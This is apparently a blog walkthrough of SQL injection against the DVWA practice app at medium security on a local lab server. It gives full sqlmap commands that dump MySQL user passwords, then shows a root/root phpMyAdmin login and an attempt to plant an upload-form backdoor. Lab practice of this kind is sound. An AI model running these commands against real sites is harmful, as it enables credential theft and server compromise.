Senin, 05 Maret 2012

SQL INJECTION DVWA (MEDIUM)

This case i using Backtrack 5 r1 to be Server.

1. access dvwa  "http://192.168.56.1/dvwa"

user name : admin
password : password
2.  security using MEDIUM


3. Open Mantra and brupsuit

on the mantra following refuse step

create proxy for brupsuit

open brupsuite


4. Using proxy brupsuite and then using '

showing in url


result in brupsuite


5. Run sql map
root@bt:/pentest/database/sqlmap# 


Showing result


search Table



Search column



Now we can see user and password

showing





6.  Ok we get the password but Our Mission is how to make backdoor in the server.. hhmmm so we must try exploit service.. i will try service mysql.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; PHPSESSID=33486pplno180m3afq6jpjout3" --dbs


I have to done a lot of ways but.. i can't upload backdoor.. to be continue...
=======================================================================

After i try again wity repeat based ways..

>>>root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql --tables



>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -T user --column


>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -C password --dump


>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" --users --password



we can see that we get is same password

>>> i try open mysql

i'm using password : root 
and we can see i manage database.. we will try open phpmyadmin

>>> localhost/phpmyadmin
user : root
password : root



>>> Created database
Sinobi_db;

>>> Created table form

>>> Created table upload


>>> Crated Form form for upload.. "way for Backdoor"
insert the data into table camp

>>> Insert data into table upload






























Tidak ada komentar:

Posting Komentar